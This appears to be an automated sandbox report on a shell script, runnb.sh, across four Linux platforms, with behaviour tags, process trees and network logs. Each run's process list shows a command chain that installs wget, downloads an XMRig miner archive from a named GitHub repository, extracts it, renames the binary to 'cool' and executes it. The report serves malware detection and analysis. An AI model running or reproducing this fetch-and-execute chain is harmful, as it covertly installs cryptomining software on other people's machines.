Malware Analysis Report

2025-08-10 16:41

Sample ID 241030-qcaa3athkm
Target runnb.sh
SHA256 a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Tags
defense_evasion discovery privilege_escalation
score
7/10

Analysis Overview

score
7/10

SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Threat Level: Shows suspicious behavior

The file runnb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery privilege_escalation

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads CPU attributes

Enumerates kernel/hardware configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 13:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.Tv8lpe /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.bJvUo4 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Ujb4X0 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.epORFa /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.4wKluk /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.tUGDrU /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.mY02xY /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.MMujmR /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.VjfRzK /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.kmQrrO /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.HpV0to /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Vh0yCy /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.TKBu8q /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Jcx9NA /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.U9uqpu /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.KjCToE /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp
GB 195.181.164.14:443 tcp

Files

/tmp/fileutl.message.MMujmR


Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-armhf-20240611-en

Max time kernel

6s

Max time network

7s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.feOWda /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.hGyOFa /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FLz5li /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.rhmRNr /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-mipsbe-20240611-en

Max time kernel

117s

Max time network

150s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.0ksS1M /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.9MdXSo /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.SpDNgo /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.UkZHET /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Cby9mA /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.ObiKey /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.4SnVT5 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.ChveDP /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67Wc-0000Bg-PL-D

/var/spool/exim4/input/hdr.724

/var/spool/exim4/msglog/1t67Wc-0000Bg-PL

/var/mail/user

/var/spool/exim4/input/1t67Wc-0000Bg-PL-J

/var/spool/exim4/input/1t67Wi-0000Bd-5p-D

/var/spool/exim4/input/hdr.721

/var/spool/exim4/msglog/1t67Wi-0000Bd-5p

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-mipsel-20240611-en

Max time kernel

51s

Max time network

53s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.ueS1Tj /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.khLB3B /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.SYpnjZ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.EjbMVs /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.5kH4KV /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FM4QZg /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.X6KWVX /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.JAGxbL /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67WX-0000Ba-U9]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67WX-0000Bd-Tl-D

/var/spool/exim4/input/1t67WX-0000Ba-U9-D

/var/spool/exim4/input/hdr.718

/var/spool/exim4/msglog/1t67WX-0000Bd-Tl

/var/spool/exim4/msglog/1t67WX-0000Ba-U9

/var/mail/user

/var/spool/exim4/input/1t67WX-0000Ba-U9-J